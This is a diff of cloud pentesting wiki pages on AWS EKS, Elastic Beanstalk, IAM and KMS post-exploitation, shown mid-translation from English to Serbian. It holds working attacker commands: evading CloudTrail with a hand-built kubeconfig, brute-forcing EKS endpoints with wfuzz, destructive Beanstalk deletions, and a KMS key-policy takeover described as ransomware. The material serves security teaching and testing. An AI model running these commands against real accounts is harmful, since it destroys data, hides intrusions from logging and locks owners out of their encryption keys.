- Nije tako lak način:
- Not that easy way:
If you can **get a token** with **`aws eks get-token --name <cluster_name>`** but you don't have permissions to get cluster info (describeCluster), you could **prepare your own `~/.kube/config`**. However, having the token, you still need the **url endpoint to connect to** (if you managed to get a JWT token from a pod read [here](aws-eks-post-exploitation.md#get-api-server-endpoint-from-a-jwt-token)) and the **name of the cluster**.
In my case, I didn't find the info in CloudWatch logs, but I **found it in LaunchTemaplates userData** and in **EC2 machines in userData also**. You can see this info in **userData** easily, for example in the next example (the cluster name was cluster-name):
Ako možete **dobiti token** sa **`aws eks get-token --name <cluster_name>`** ali nemate dozvole za dobijanje informacija o klasteru (describeCluster), mogli biste **pripremiti svoj `~/.kube/config`**. Međutim, imajući token, još uvek vam je potreban **url endpoint za povezivanje** (ako ste uspeli da dobijete JWT token iz poda pročitajte [ovde](aws-eks-post-exploitation.md#get-api-server-endpoint-from-a-jwt-token)) i **ime klastera**.
U mom slučaju, nisam našao informacije u CloudWatch logovima, ali sam **pronašao u LaunchTemplates userData** i u **EC2 mašinama u userData takođe**. Ove informacije možete lako videti u **userData**, na primer u sledećem primeru (ime klastera je bilo cluster-name):
```bash
API_SERVER_URL=https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-east-1.eks.amazonaws.com
/etc/eks/bootstrap.sh cluster-name --kubelet-extra-args '--node-labels=eks.amazonaws.com/sourceLaunchTemplateVersion=1,alpha.eksctl.io/cluster-name=cluster-name,alpha.eksctl.io/nodegroup-name=prd-ondemand-us-west-2b,role=worker,eks.amazonaws.com/nodegroup-image=ami-002539dd2c532d0a5,eks.amazonaws.com/capacityType=ON_DEMAND,eks.amazonaws.com/nodegroup=prd-ondemand-us-west-2b,type=ondemand,eks.amazonaws.com/sourceLaunchTemplateId=lt-0f0f0ba62bef782e5 --max-pods=58' --b64-cluster-ca $B64_CLUSTER_CA --apiserver-endpoint $API_SERVER_URL --dns-cluster-ip $K8S_CLUSTER_DNS_IP --use-max-pods false
```
<details>
<summary>kube config</summary>
<summary>kube konfiguracija</summary>
```yaml
describe-cache-parametersapiVersion: v1
clusters:
- cluster:
certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUMvakNDQWVhZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwcmRXSmwKY201bGRHVnpNQjRYRFRJeU1USXlPREUyTWpjek1Wb1hEVE15TVRJeU5URTJNamN6TVZvd0ZURVRNQkVHQTFVRQpBeE1LYTNWaVpYSnVaWFJsY3pDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTDlXCk9OS0ZqeXZoRUxDZGhMNnFwWkMwa1d0UURSRVF1UzVpRDcwK2pjbjFKWXZ4a3FsV1ZpbmtwOUt5N2x2ME5mUW8KYkNqREFLQWZmMEtlNlFUWVVvOC9jQXJ4K0RzWVlKV3dzcEZGbWlsY1lFWFZHMG5RV1VoMVQ3VWhOanc0MllMRQpkcVpzTGg4OTlzTXRLT1JtVE5sN1V6a05pTlUzSytueTZSRysvVzZmbFNYYnRiT2kwcXJSeFVpcDhMdWl4WGRVCnk4QTg3VjRjbllsMXo2MUt3NllIV3hhSm11eWI5enRtbCtBRHQ5RVhOUXhDMExrdWcxSDBqdTl1MDlkU09YYlkKMHJxY2lINjYvSTh0MjlPZ3JwNkY0dit5eUNJUjZFQURRaktHTFVEWUlVSkZ4WXA0Y1pGcVA1aVJteGJ5Nkh3UwpDSE52TWNJZFZRRUNQMlg5R2c4Q0F3RUFBYU5aTUZjd0RnWURWUjBQQVFIL0JBUURBZ0trTUE4R0ExVWRFd0VCCi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZQVXFsekhWZmlDd0xqalhPRmJJUUc3L0VxZ1hNQlVHQTFVZEVRUU8KTUF5Q0NtdDFZbVZ5Ym1WMFpYTXdEUVlKS29aSWh2Y05BUUVMQlFBRGdnRUJBS1o4c0l4aXpsemx0aXRPcGcySgpYV0VUSThoeWxYNWx6cW1mV0dpZkdFVVduUDU3UEVtWW55eWJHbnZ5RlVDbnczTldMRTNrbEVMQVE4d0tLSG8rCnBZdXAzQlNYamdiWFovdWVJc2RhWlNucmVqNU1USlJ3SVFod250ZUtpU0J4MWFRVU01ZGdZc2c4SlpJY3I2WC8KRG5POGlHOGxmMXVxend1dUdHSHM2R1lNR0Mvd1V0czVvcm1GS291SmtSUWhBZElMVkNuaStYNCtmcHUzT21UNwprS3VmR0tyRVlKT09VL1c2YTB3OTRycU9iSS9Mem1GSWxJQnVNcXZWVDBwOGtlcTc1eklpdGNzaUJmYVVidng3Ci9sMGhvS1RqM0IrOGlwbktIWW4wNGZ1R2F2YVJRbEhWcldDVlZ4c3ZyYWpxOUdJNWJUUlJ6TnpTbzFlcTVZNisKRzVBPQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg==
server: https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-west-2.eks.amazonaws.com
name: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
- cluster:
certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUMvakNDQWVhZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwcmRXSmwKY201bGRHVnpNQjRYRFRJeU1USXlPREUyTWpjek1Wb1hEVE15TVRJeU5URTJNamN6TVZvd0ZURVRNQkVHQTFVRQpBeE1LYTNWaVpYSnVaWFJsY3pDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTDlXCk9OS0ZqeXZoRUxDZGhMNnFwWkMwa1d0UURSRVF1UzVpRDcwK2pjbjFKWXZ4a3FsV1ZpbmtwOUt5N2x2ME5mUW8KYkNqREFLQWZmMEtlNlFUWVVvOC9jQXJ4K0RzWVlKV3dzcEZGbWlsY1lFWFZHMG5RV1VoMVQ3VWhOanc0MllMRQpkcVpzTGg4OTlzTXRLT1JtVE5sN1V6a05pTlUzSytueTZSRysvVzZmbFNYYnRiT2kwcXJSeFVpcDhMdWl4WGRVCnk4QTg3VjRjbllsMXo2MUt3NllIV3hhSm11eWI5enRtbCtBRHQ5RVhOUXhDMExrdWcxSDBqdTl1MDlkU09YYlkKMHJxY2lINjYvSTh0MjlPZ3JwNkY0dit5eUNJUjZFQURRaktHTFVEWUlVSkZ4WXA0Y1pGcVA1aVJteGJ5Nkh3UwpDSE52TWNJZFZRRUNQMlg5R2c4Q0F3RUFBYU5aTUZjd0RnWURWUjBQQVFIL0JBUURBZ0trTUE4R0ExVWRFd0VCCi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZQVXFsekhWZmlDd0xqalhPRmJJUUc3L0VxZ1hNQlVHQTFVZEVRUU8KTUF5Q0NtdDFZbVZ5Ym1WMFpYTXdEUVlKS29aSWh2Y05BUUVMQlFBRGdnRUJBS1o4c0l4aXpsemx0aXRPcGcySgpYV0VUSThoeWxYNWx6cW1mV0dpZkdFVVduUDU3UEVtWW55eWJHbnZ5RlVDbnczTldMRTNrbEVMQVE4d0tLSG8rCnBZdXAzQlNYamdiWFovdWVJc2RhWlNucmVqNU1USlJ3SVFod250ZUtpU0J4MWFRVU01ZGdZc2c4SlpJY3I2WC8KRG5POGlHOGxmMXVxend1dUdHSHM2R1lNR0Mvd1V0czVvcm1GS291SmtSUWhBZElMVkNuaStYNCtmcHUzT21UNwprS3VmR0tyRVlKT09VL1c2YTB3OTRycU9iSS9Mem1GSWxJQnVNcXZWVDBwOGtlcTc1eklpdGNzaUJmYVVidng3Ci9sMGhvS1RqM0IrOGlwbktIWW4wNGZ1R2F2YVJRbEhWcldDVlZ4c3ZyYWpxOUdJNWJUUlJ6TnpTbzFlcTVZNisKRzVBPQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg==
server: https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-west-2.eks.amazonaws.com
name: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
contexts:
- context:
cluster: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
user: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
name: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
- context:
cluster: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
user: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
name: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
current-context: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
kind: Config
preferences: {}
users:
- name: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
user:
exec:
apiVersion: client.authentication.k8s.io/v1beta1
args:
- --region
- us-west-2
- --profile
- <profile>
- eks
- get-token
- --cluster-name
- <cluster-name>
command: aws
env: null
interactiveMode: IfAvailable
provideClusterInfo: false
- name: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
user:
exec:
apiVersion: client.authentication.k8s.io/v1beta1
args:
- --region
- us-west-2
- --profile
- <profile>
- eks
- get-token
- --cluster-name
- <cluster-name>
command: aws
env: null
interactiveMode: IfAvailable
provideClusterInfo: false
```
</details>
### From AWS to Kubernetes
### Od AWS do Kubernetes
The **creator** of the **EKS cluster** is **ALWAYS** going to be able to get into the kubernetes cluster part of the group **`system:masters`** (k8s admin). At the time of this writing there is **no direct way** to find **who created** the cluster (you can check CloudTrail). And the is **no way** to **remove** that **privilege**.
**Kreator** **EKS klastera** će **UVEK** moći da uđe u deo kubernetes klastera grupe **`system:masters`** (k8s admin). U trenutku pisanja ovog teksta **ne postoji direktan način** da se sazna **ko je kreirao** klaster (možete proveriti CloudTrail). I **ne postoji način** da se **ukloni** ta **privilegija**.
The way to grant **access to over K8s to more AWS IAM users or roles** is using the **configmap** **`aws-auth`**.
Način da se dodeli **pristup više AWS IAM korisnicima ili rolama** je korišćenjem **configmap** **`aws-auth`**.
> [!WARNING]
> Therefore, anyone with **write access** over the config map **`aws-auth`** will be able to **compromise the whole cluster**.
> Stoga, svako ko ima **pristup za pisanje** na config mapu **`aws-auth`** će moći da **kompromituje ceo klaster**.
For more information about how to **grant extra privileges to IAM roles & users** in the **same or different account** and how to **abuse** this to [**privesc check this page**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#aws-eks-aws-auth-configmaps).
Za više informacija o tome kako da **dodelite dodatne privilegije IAM rolama i korisnicima** u **isto ili različitoj računu** i kako da **zloupotrebite** ovo da [**privesc proverite ovu stranicu**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#aws-eks-aws-auth-configmaps).
Check also[ **this awesome**](https://blog.lightspin.io/exploiting-eks-authentication-vulnerability-in-aws-iam-authenticator) **post to learn how the authentication IAM -> Kubernetes work**.
Proverite takođe[ **ovaj sjajan**](https://blog.lightspin.io/exploiting-eks-authentication-vulnerability-in-aws-iam-authenticator) **post da saznate kako funkcioniše autentifikacija IAM -> Kubernetes**.
### From Kubernetes to AWS
### Od Kubernetes do AWS
It's possible to allow an **OpenID authentication for kubernetes service account** to allow them to assume roles in AWS. Learn how [**this work in this page**](../../kubernetes-security/kubernetes-pivoting-to-clouds.md#workflow-of-iam-role-for-service-accounts-1).
Moguće je omogućiti **OpenID autentifikaciju za kubernetes servisni nalog** da im omogući da preuzmu uloge u AWS-u. Saznajte kako [**to funkcioniše na ovoj stranici**](../../kubernetes-security/kubernetes-pivoting-to-clouds.md#workflow-of-iam-role-for-service-accounts-1).
### GET Api Server Endpoint from a JWT Token
Decoding the JWT token we get the cluster id & also the region. ![image](https://github.com/HackTricks-wiki/hacktricks-cloud/assets/87022719/0e47204a-eea5-4fcb-b702-36dc184a39e9) Knowing that the standard format for EKS url is
### GET Api Server Endpoint iz JWT Tokena
Dekodiranjem JWT tokena dobijamo id klastera i takođe region. ![image](https://github.com/HackTricks-wiki/hacktricks-cloud/assets/87022719/0e47204a-eea5-4fcb-b702-36dc184a39e9) Znajući da je standardni format za EKS url
```bash
https://<cluster-id>.<two-random-chars><number>.<region>.eks.amazonaws.com
```
Didn't find any documentation that explain the criteria for the 'two chars' and the 'number'. But making some test on my behalf I see recurring these one:
Nisam pronašao nikakvu dokumentaciju koja objašnjava kriterijume za 'dva karaktera' i 'broj'. Ali, radeći neke testove u svoje ime, primetio sam da se ovi ponavljaju:
- gr7
- yl4
Anyway are just 3 chars we can bruteforce them. Use the below script for generating the list
U svakom slučaju, to su samo 3 karaktera koje možemo bruteforce-ovati. Koristite ispod navedeni skript za generisanje liste.
```python
from itertools import product
from string import ascii_lowercase
@@ -116,44 +107,37 @@ letter_combinations = product('abcdefghijklmnopqrstuvwxyz', repeat = 2)
number_combinations = product('0123456789', repeat = 1)
result = [
f'{''.join(comb[0])}{comb[1][0]}'
for comb in product(letter_combinations, number_combinations)
f'{''.join(comb[0])}{comb[1][0]}'
for comb in product(letter_combinations, number_combinations)
]
with open('out.txt', 'w') as f:
f.write('\n'.join(result))
f.write('\n'.join(result))
```
Then with wfuzz
Тада са wfuzz
```bash
wfuzz -Z -z file,out.txt --hw 0 https://<cluster-id>.FUZZ.<region>.eks.amazonaws.com
```
> [!WARNING]
> Remember to replace & .
> Запамтите да замените & .
### Bypass CloudTrail
### Заобилажење CloudTrail
If an attacker obtains credentials of an AWS with **permission over an EKS**. If the attacker configures it's own **`kubeconfig`** (without calling **`update-kubeconfig`**) as explained previously, the **`get-token`** doesn't generate logs in Cloudtrail because it doesn't interact with the AWS API (it just creates the token locally).
Ако нападач добије акредитиве AWS са **дозволом над EKS**. Ако нападач конфигурише свој **`kubeconfig`** (без позивања **`update-kubeconfig`**) као што је објашњено раније, **`get-token`** не генерише логове у Cloudtrail-у јер не интерактује са AWS API-jem (само локално креира токен).
So when the attacker talks with the EKS cluster, **cloudtrail won't log anything related to the user being stolen and accessing it**.
Дакле, када нападач комуницира са EKS кластером, **cloudtrail неће логовати ништа у вези са украденим корисником и његовим приступом**.
Note that the **EKS cluster might have logs enabled** that will log this access (although, by default, they are disabled).
Напомена да **EKS кластер може имати укључене логове** који ће логовати овај приступ (иако су по подразумеваној поставци онемогућени).
### EKS Ransom?
### EKS Откуп?
By default the **user or role that created** a cluster is **ALWAYS going to have admin privileges** over the cluster. And that the only "secure" access AWS will have over the Kubernetes cluster.
По подразумеваној поставци, **корисник или улога која је креирала** кластер **УВЕК ће имати администраторске привилегије** над кластером. И да је то једини "сигуран" приступ који AWS може имати над Kubernetes кластером.
So, if an **attacker compromises a cluster using fargate** and **removes all the other admins** and d**eletes the AWS user/role that created** the Cluster, ~~the attacker could have **ransomed the cluste**~~**r**.
Дакле, ако **нападач компромитује кластер користећи fargate** и **уклони све остале администраторе** и **обрише AWS корисника/улогу која је креирала** кластер, ~~нападач би могао да **откупи кластер**~~**.
> [!TIP]
> Note that if the cluster was using **EC2 VMs**, it could be possible to get Admin privileges from the **Node** and recover the cluster.
> Напомена да ако је кластер користио **EC2 ВМ**, могло би бити могуће добити администраторске привилегије из **Node** и опоравити кластер.
>
> Actually, If the cluster is using Fargate you could EC2 nodes or move everything to EC2 to the cluster and recover it accessing the tokens in the node.
> У ствари, ако кластер користи Fargate, могли бисте EC2 чворове или преместити све на EC2 у кластер и опоравити га приступајући токенима у чвору.
{{#include ../../../banners/hacktricks-training.md}}

50
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md
View File

@@ -4,7 +4,7 @@
## Elastic Beanstalk
For more information:
Za više informacija:
{{#ref}}
../aws-services/aws-elastic-beanstalk-enum.md
@@ -13,72 +13,58 @@ For more information:
### `elasticbeanstalk:DeleteApplicationVersion`
> [!NOTE]
> TODO: Test if more permissions are required for this
An attacker with the permission `elasticbeanstalk:DeleteApplicationVersion` can **delete an existing application version**. This action could disrupt application deployment pipelines or cause loss of specific application versions if not backed up.
> TODO: Testirati da li su potrebne dodatne dozvole za ovo
Napadač sa dozvolom `elasticbeanstalk:DeleteApplicationVersion` može **izbrisati postojeću verziju aplikacije**. Ova akcija može ometati procese implementacije aplikacija ili uzrokovati gubitak specifičnih verzija aplikacija ako nisu sačuvane.
```bash
aws elasticbeanstalk delete-application-version --application-name my-app --version-label my-version
```
**Potential Impact**: Disruption of application deployment and potential loss of application versions.
**Potencijalni Uticaj**: Poremećaj u implementaciji aplikacija i potencijalni gubitak verzija aplikacija.
### `elasticbeanstalk:TerminateEnvironment`
> [!NOTE]
> TODO: Test if more permissions are required for this
An attacker with the permission `elasticbeanstalk:TerminateEnvironment` can **terminate an existing Elastic Beanstalk environment**, causing downtime for the application and potential data loss if the environment is not configured for backups.
> [!NAPOMENA]
> TODO: Testirati da li su potrebne dodatne dozvole za ovo
Napadač sa dozvolom `elasticbeanstalk:TerminateEnvironment` može **ukinuti postojeće Elastic Beanstalk okruženje**, uzrokujući prekid rada aplikacije i potencijalni gubitak podataka ako okruženje nije konfigurisano za rezervne kopije.
```bash
aws elasticbeanstalk terminate-environment --environment-name my-existing-env
```
**Potential Impact**: Downtime of the application, potential data loss, and disruption of services.
**Potencijalni uticaj**: Vreme neaktivnosti aplikacije, potencijalni gubitak podataka i prekid usluga.
### `elasticbeanstalk:DeleteApplication`
> [!NOTE]
> TODO: Test if more permissions are required for this
An attacker with the permission `elasticbeanstalk:DeleteApplication` can **delete an entire Elastic Beanstalk application**, including all its versions and environments. This action could cause a significant loss of application resources and configurations if not backed up.
> TODO: Testirati da li su potrebne dodatne dozvole za ovo
Napadač sa dozvolom `elasticbeanstalk:DeleteApplication` može **izbrisati celu Elastic Beanstalk aplikaciju**, uključujući sve njene verzije i okruženja. Ova akcija može izazvati značajan gubitak resursa i konfiguracija aplikacije ako nisu sačuvani.
```bash
aws elasticbeanstalk delete-application --application-name my-app --terminate-env-by-force
```
**Potential Impact**: Loss of application resources, configurations, environments, and application versions, leading to service disruption and potential data loss.
**Potencijalni uticaj**: Gubitak resursa aplikacije, konfiguracija, okruženja i verzija aplikacije, što može dovesti do prekida usluge i potencijalnog gubitka podataka.
### `elasticbeanstalk:SwapEnvironmentCNAMEs`
> [!NOTE]
> TODO: Test if more permissions are required for this
An attacker with the `elasticbeanstalk:SwapEnvironmentCNAMEs` permission can **swap the CNAME records of two Elastic Beanstalk environments**, which might cause the wrong version of the application to be served to users or lead to unintended behavior.
> TODO: Testirati da li su potrebne dodatne dozvole za ovo
Napadač sa `elasticbeanstalk:SwapEnvironmentCNAMEs` dozvolom može **promeniti CNAME zapise dva Elastic Beanstalk okruženja**, što može uzrokovati da pogrešna verzija aplikacije bude dostupna korisnicima ili dovesti do nepredviđenog ponašanja.
```bash
aws elasticbeanstalk swap-environment-cnames --source-environment-name my-env-1 --destination-environment-name my-env-2
```
**Potential Impact**: Serving the wrong version of the application to users or causing unintended behavior in the application due to swapped environments.
**Potencijalni uticaj**: Posluživanje pogrešne verzije aplikacije korisnicima ili izazivanje nepredviđenog ponašanja u aplikaciji zbog zamenjenih okruženja.
### `elasticbeanstalk:AddTags`, `elasticbeanstalk:RemoveTags`
> [!NOTE]
> TODO: Test if more permissions are required for this
An attacker with the `elasticbeanstalk:AddTags` and `elasticbeanstalk:RemoveTags` permissions can **add or remove tags on Elastic Beanstalk resources**. This action could lead to incorrect resource allocation, billing, or resource management.
> [!NAPOMENA]
> TODO: Testirati da li su potrebne dodatne dozvole za ovo
Napadač sa `elasticbeanstalk:AddTags` i `elasticbeanstalk:RemoveTags` dozvolama može **dodavati ili uklanjati oznake na Elastic Beanstalk resursima**. Ova akcija može dovesti do pogrešne alokacije resursa, naplate ili upravljanja resursima.
```bash
aws elasticbeanstalk add-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tags Key=MaliciousTag,Value=1
aws elasticbeanstalk remove-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tag-keys MaliciousTag
```
**Potential Impact**: Incorrect resource allocation, billing, or resource management due to added or removed tags.
**Potencijalni uticaj**: Neispravna alokacija resursa, naplata ili upravljanje resursima zbog dodatih ili uklonjenih oznaka.
{{#include ../../../banners/hacktricks-training.md}}

100
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md
View File

@@ -4,104 +4,90 @@
## IAM
For more information about IAM access:
Za više informacija o IAM pristupu:
{{#ref}}
../aws-services/aws-iam-enum.md
{{#endref}}
## Confused Deputy Problem
## Problem zbunjenog zamenika
If you **allow an external account (A)** to access a **role** in your account, you will probably have **0 visibility** on **who can exactly access that external account**. This is a problem, because if another external account (B) can access the external account (A) it's possible that **B will also be able to access your account**.
Ako **dozvolite eksternom nalogu (A)** da pristupi **rolu** u vašem nalogu, verovatno ćete imati **0 vidljivosti** o **tome ko tačno može pristupiti tom eksternom nalogu**. To je problem, jer ako drugi eksterni nalog (B) može pristupiti eksternom nalogu (A), moguće je da **B takođe može pristupiti vašem nalogu**.
Therefore, when allowing an external account to access a role in your account it's possible to specify an `ExternalId`. This is a "secret" string that the external account (A) **need to specify** in order to **assume the role in your organization**. As the **external account B won't know this string**, even if he has access over A he **won't be able to access your role**.
Stoga, kada dozvoljavate eksternom nalogu da pristupi roli u vašem nalogu, moguće je odrediti `ExternalId`. Ovo je "tajna" string koja eksterni nalog (A) **mora da navede** kako bi **preuzeo ulogu u vašoj organizaciji**. Kako **eksterni nalog B neće znati ovu string**, čak i ako ima pristup A, **neće moći da pristupi vašoj roli**.
<figure><img src="../../../images/image (95).png" alt=""><figcaption></figcaption></figure>
However, note that this `ExternalId` "secret" is **not a secret**, anyone that can **read the IAM assume role policy will be able to see it**. But as long as the external account A knows it, but the external account **B doesn't know it**, it **prevents B abusing A to access your role**.
Example:
Međutim, imajte na umu da ova `ExternalId` "tajna" **nije tajna**, svako ko može **da pročita IAM politiku preuzimanja uloge moći će da je vidi**. Ali sve dok eksterni nalog A to zna, a eksterni nalog **B to ne zna**, to **sprečava B da zloupotrebi A kako bi pristupio vašoj roli**.
Primer:
```json
{
"Version": "2012-10-17",
"Statement": {
"Effect": "Allow",
"Principal": {
"AWS": "Example Corp's AWS Account ID"
},
"Action": "sts:AssumeRole",
"Condition": {
"StringEquals": {
"sts:ExternalId": "12345"
}
}
}
"Version": "2012-10-17",
"Statement": {
"Effect": "Allow",
"Principal": {
"AWS": "Example Corp's AWS Account ID"
},
"Action": "sts:AssumeRole",
"Condition": {
"StringEquals": {
"sts:ExternalId": "12345"
}
}
}
}
```
> [!WARNING]
> For an attacker to exploit a confused deputy he will need to find somehow if principals of the current account can impersonate roles in other accounts.
> Da bi napadač iskoristio zbunjenog zamenika, moraće nekako da sazna da li subjekti trenutnog naloga mogu da imituju uloge u drugim nalozima.
### Unexpected Trusts
#### Wildcard as principal
### Neočekivana poverenja
#### Wildcard kao subjekt
```json
{
"Action": "sts:AssumeRole",
"Effect": "Allow",
"Principal": { "AWS": "*" }
"Action": "sts:AssumeRole",
"Effect": "Allow",
"Principal": { "AWS": "*" }
}
```
Ova politika **omogućava svim AWS** da preuzmu ulogu.
This policy **allows all AWS** to assume the role.
#### Service as principal
#### Usluga kao glavni
```json
{
"Action": "lambda:InvokeFunction",
"Effect": "Allow",
"Principal": { "Service": "apigateway.amazonaws.com" },
"Resource": "arn:aws:lambda:000000000000:function:foo"
"Action": "lambda:InvokeFunction",
"Effect": "Allow",
"Principal": { "Service": "apigateway.amazonaws.com" },
"Resource": "arn:aws:lambda:000000000000:function:foo"
}
```
Ova politika **dozvoljava bilo kojem nalogu** da konfiguriše svoj apigateway da poziva ovu Lambda.
This policy **allows any account** to configure their apigateway to call this Lambda.
#### S3 as principal
#### S3 kao glavni
```json
"Condition": {
"ArnLike": { "aws:SourceArn": "arn:aws:s3:::source-bucket" },
"StringEquals": {
"aws:SourceAccount": "123456789012"
}
"StringEquals": {
"aws:SourceAccount": "123456789012"
}
}
```
Ako je S3 kofa data kao principal, pošto S3 kofe nemaju ID naloga, ako ste **obrisali svoju kofu i napadač je kreirao** je u svom nalogu, onda bi mogli da to zloupotrebe.
If an S3 bucket is given as a principal, because S3 buckets do not have an Account ID, if you **deleted your bucket and the attacker created** it in their own account, then they could abuse this.
#### Not supported
#### Nije podržano
```json
{
"Effect": "Allow",
"Principal": { "Service": "cloudtrail.amazonaws.com" },
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::myBucketName/AWSLogs/MY_ACCOUNT_ID/*"
"Effect": "Allow",
"Principal": { "Service": "cloudtrail.amazonaws.com" },
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::myBucketName/AWSLogs/MY_ACCOUNT_ID/*"
}
```
A common way to avoid Confused Deputy problems is the use of a condition with `AWS:SourceArn` to check the origin ARN. However, **some services might not support that** (like CloudTrail according to some sources).
Uobičajen način da se izbegnu problemi sa Confused Deputy je korišćenje uslova sa `AWS:SourceArn` za proveru izvora ARN. Međutim, **neke usluge možda to ne podržavaju** (kao što je CloudTrail prema nekim izvorima).
## References
- [https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html)
{{#include ../../../banners/hacktricks-training.md}}

136
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md
View File

@@ -4,134 +4,122 @@
## KMS
For more information check:
Za više informacija pogledajte:
{{#ref}}
../aws-services/aws-kms-enum.md
{{#endref}}
### Encrypt/Decrypt information
### Enkriptovanje/Dekriptovanje informacija
`fileb://` and `file://` are URI schemes used in AWS CLI commands to specify the path to local files:
`fileb://` i `file://` su URI sheme koje se koriste u AWS CLI komandama za specificiranje puta do lokalnih fajlova:
- `fileb://:` Reads the file in binary mode, commonly used for non-text files.
- `file://:` Reads the file in text mode, typically used for plain text files, scripts, or JSON that doesn't have special encoding requirements.
- `fileb://:` Čita fajl u binarnom režimu, obično se koristi za ne-tekstualne fajlove.
- `file://:` Čita fajl u tekstualnom režimu, obično se koristi za obične tekstualne fajlove, skripte ili JSON koji nemaju posebne zahteve za kodiranje.
> [!TIP]
> Note that if you want to decrypt some data inside a file, the file must contain the binary data, not base64 encoded data. (fileb://)
- Using a **symmetric** key
> Imajte na umu da ako želite da dekriptujete neke podatke unutar fajla, fajl mora sadržati binarne podatke, a ne base64 kodirane podatke. (fileb://)
- Koristeći **simetrični** ključ
```bash
# Encrypt data
aws kms encrypt \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile
# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--output text \
--query Plaintext | base64 \
--decode
--ciphertext-blob fileb://ExampleEncryptedFile \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--output text \
--query Plaintext | base64 \
--decode
```
- Using a **asymmetric** key:
- Koristeći **asimetrični** ključ:
```bash
# Encrypt data
aws kms encrypt \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile
# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--output text \
--query Plaintext | base64 \
--decode
--ciphertext-blob fileb://ExampleEncryptedFile \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--output text \
--query Plaintext | base64 \
--decode
```
### KMS Ransomware
An attacker with privileged access over KMS could modify the KMS policy of keys and **grant his account access over them**, removing the access granted to the legit account.
Napadač sa privilegovanim pristupom KMS-u može da izmeni KMS politiku ključeva i **dodeli svom nalogu pristup tim ključevima**, uklanjajući pristup koji je dodeljen legitimnom nalogu.
Then, the legit account users won't be able to access any informatcion of any service that has been encrypted with those keys, creating an easy but effective ransomware over the account.
Tada korisnici legitimnog naloga neće moći da pristupe bilo kojim informacijama bilo koje usluge koja je enkriptovana tim ključevima, stvarajući lak ali efikasan ransomware nad nalogom.
> [!WARNING]
> Note that **AWS managed keys aren't affected** by this attack, only **Customer managed keys**.
> Also note the need to use the param **`--bypass-policy-lockout-safety-check`** (the lack of this option in the web console makes this attack only possible from the CLI).
> Imajte na umu da **AWS upravljani ključevi nisu pogođeni** ovim napadom, samo **Klijentski upravljani ključevi**.
> Takođe imajte na umu potrebu da koristite parametar **`--bypass-policy-lockout-safety-check`** (nedostatak ove opcije u web konzoli čini ovaj napad mogućim samo iz CLI-a).
```bash
# Force policy change
aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
--policy-name default \
--policy file:///tmp/policy.yaml \
--bypass-policy-lockout-safety-check
--policy-name default \
--policy file:///tmp/policy.yaml \
--bypass-policy-lockout-safety-check
{
"Id": "key-consolepolicy-3",
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
